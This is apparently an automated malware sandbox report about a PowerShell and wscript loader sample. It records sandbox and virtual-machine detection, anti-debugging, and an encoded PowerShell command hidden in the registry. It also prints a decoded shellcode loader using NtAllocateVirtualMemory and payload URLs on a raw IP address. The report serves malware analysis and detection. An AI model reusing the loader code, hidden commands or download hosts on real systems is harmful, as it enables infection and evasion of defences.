            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: powershell.exe, 0000000D.00000003.15980734542.0000000008498000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16227173790.0000000008498000.00000004.00000001.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE*=
            Source: ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmpBinary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNDEATHWE2SOFTWARE\APPDATALOW\NYDELSESMIC:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE -WINDOWSTYLE HIDDEN $DISCOMMO=(GET-ITEMPROPERTY -PATH 'HKCU:\SOFTWARE\APPDATALOW\').NYDELSESMI;POWERSHELL.EXE -WINDOWSTYLE HIDDEN -ENCODEDCOMMAND($DISCOMMO)HTTP://103.167.84.150/MCONTA/HOST_DWUBTLYDN243.BINHTTP://103.167.84.150/BCONTA/HOST_DWUBTLYDN243.BIN
            Source: ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16377684340.0000000008BA0000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmpBinary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNDEATHWE2HTTP://103.167.84.150/MCONTA/HOST_DWUBTLYDN243.BINHTTP://103.167.84.150/BCONTA/HOST_DWUBTLYDN243.BIN
            Source: powershell.exe, 0000000E.00000002.16330545492.0000000000B9F000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: powershell.exe, 0000000D.00000003.15980734542.0000000008498000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16227173790.0000000008498000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE0OK
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3380Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4024Thread sleep count: 9692 > 30Jump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4024Thread sleep time: -48460s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep time: -11990383647911201s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep count: 8939 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656Thread sleep count: 7304 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2708Thread sleep count: 41 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1372Thread sleep time: -10145709240540247s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep count: 7364 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4140Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread sleep count: Count: 9692 delay: -5Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeLast function: Thread delayed
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uotckr0j.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vybs2gqu.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mla4kvb3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0842C6E0 rdtsc 3_2_0842C6E0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7437Jump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeWindow / User API: threadDelayed 9692Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7646Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8939Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7304
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7364
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07B96980 GetSystemInfo,9_2_07B96980
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformationJump to behavior
            Source: powershell.exe, 00000003.00000002.15296346029.000000000B2D9000.00000004.00000001.sdmp, ieinstal.exe, 00000007.00000002.16982621026.0000000004C99000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16237703934.000000000AA69000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16379639423.000000000AB09000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16199207861.0000000004A89000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: ieinstal.exe, 00000007.00000002.16980856005.0000000003187000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWX
            Source: powershell.exe, 00000003.00000002.15296346029.000000000B2D9000.00000004.00000001.sdmp, ieinstal.exe, 00000007.00000002.16982621026.0000000004C99000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16237703934.000000000AA69000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16379639423.000000000AB09000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16199207861.0000000004A89000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: powershell.exe, 0000000D.00000003.15980734542.0000000008498000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16227173790.0000000008498000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe0OK
            Source: ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: powershell.exe, 0000000D.00000003.15980734542.0000000008498000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16227173790.0000000008498000.00000004.00000001.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe*=
            Source: powershell.exe, 00000003.00000002.15296346029.000000000B2D9000.00000004.00000001.sdmp, ieinstal.exe, 00000007.00000002.16982621026.0000000004C99000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16237703934.000000000AA69000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16379639423.000000000AB09000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16199207861.0000000004A89000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmpBinary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunDeathwe2SOFTWARE\AppDataLow\Nydelsesmic:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)http://103.167.84.150/mconta/Host_DwUbTLydN243.binhttp://103.167.84.150/bconta/Host_DwUbTLydN243.bin
            Source: powershell.exe, 00000003.00000002.15296346029.000000000B2D9000.00000004.00000001.sdmp, ieinstal.exe, 00000007.00000002.16982621026.0000000004C99000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16237703934.000000000AA69000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16379639423.000000000AB09000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16199207861.0000000004A89000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: powershell.exe, 00000003.00000002.15296346029.000000000B2D9000.00000004.00000001.sdmp, ieinstal.exe, 00000007.00000002.16982621026.0000000004C99000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16237703934.000000000AA69000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16379639423.000000000AB09000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16199207861.0000000004A89000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: ieinstal.exe, 00000007.00000002.16980426643.0000000003159000.00000004.00000020.sdmp, ieinstal.exe, 00000007.00000002.16980856005.0000000003187000.00000004.00000020.sdmp, ieinstal.exe, 00000013.00000002.16197042104.0000000002EEE000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16337063429.00000000032F9000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16377684340.0000000008BA0000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmpBinary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunDeathwe2http://103.167.84.150/mconta/Host_DwUbTLydN243.binhttp://103.167.84.150/bconta/Host_DwUbTLydN243.bin
            Source: powershell.exe, 00000003.00000002.15296346029.000000000B2D9000.00000004.00000001.sdmp, ieinstal.exe, 00000007.00000002.16982621026.0000000004C99000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16237703934.000000000AA69000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16379639423.000000000AB09000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16199207861.0000000004A89000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: powershell.exe, 00000003.00000002.15296346029.000000000B2D9000.00000004.00000001.sdmp, ieinstal.exe, 00000007.00000002.16982621026.0000000004C99000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16237703934.000000000AA69000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16379639423.000000000AB09000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16199207861.0000000004A89000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: ieinstal.exe, 00000013.00000002.16196062237.0000000002EB9000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW j
            Source: ieinstal.exe, 00000014.00000002.16336303615.00000000032CA000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW`
            Source: powershell.exe, 00000003.00000002.15296346029.000000000B2D9000.00000004.00000001.sdmp, ieinstal.exe, 00000007.00000002.16982621026.0000000004C99000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16237703934.000000000AA69000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16379639423.000000000AB09000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16199207861.0000000004A89000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: powershell.exe, 0000000E.00000002.16330545492.0000000000B9F000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread information set: HideFromDebugger
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread information set: HideFromDebugger
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0842C6E0 rdtsc 3_2_0842C6E0
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D294AE mov eax, dword ptr fs:[00000030h]19_2_02D294AE
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D247C8 mov eax, dword ptr fs:[00000030h]19_2_02D247C8
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D2A368 mov eax, dword ptr fs:[00000030h]19_2_02D2A368
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D2473C mov eax, dword ptr fs:[00000030h]19_2_02D2473C
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0300473C mov eax, dword ptr fs:[00000030h]20_2_0300473C
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0300A368 mov eax, dword ptr fs:[00000030h]20_2_0300A368
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_030047C8 mov eax, dword ptr fs:[00000030h]20_2_030047C8
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_030094AE mov eax, dword ptr fs:[00000030h]20_2_030094AE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_00B8BAE2 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,7_2_00B8BAE2
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D24E8A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LoadLibraryA,NtProtectVirtualMemory,19_2_02D24E8A
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_03004E8A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LoadLibraryA,NtProtectVirtualMemory,20_2_03004E8A

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Encrypted powershell cmdline option foundShow sources
            Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Slag9 UNNOBLETOR supereleme hjemmehjl unnig COMPARAT HORTIKULT DRAINER Viktori1 Unla4 Potenti5 essenian scarphing BILESTO Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Opisthoc31{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);}"@#Adaptionsm9 cottidaeud knirkeri Lkkerfl9 FISKE Svve7 udadl ufrav Distribut6 TAGASS Manu Ubrligdu Cololi Test-Path "FLAS" $Opisthoc32="$env:temp" + "\Depopulato2.dat"#GASTUR behers ANTIP Chitino6 incorpor pullic Spinketce Sparrehy kontrab SVINEAVLEN konto Revalidend1 Sekun Myel Clysteriz4 Alalongaaf Arbitrate3 aftenhi STERI Erkl6 AGLOSSALBE Almeries3 Test-Path "BUREAUKRAT" $Opisthoc33=0;$Opisthoc39=1048576;$Opisthoc38=[Opisthoc31]::NtAllocateVirtualMemory(-1,[ref]$Opisthoc33,0,[ref]$Opisthoc39,12288,64)#stjmaaling fjerlet Twins BAJARIG Naturp Erseun progra Chinl Compi1 Mellemk Unscala
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
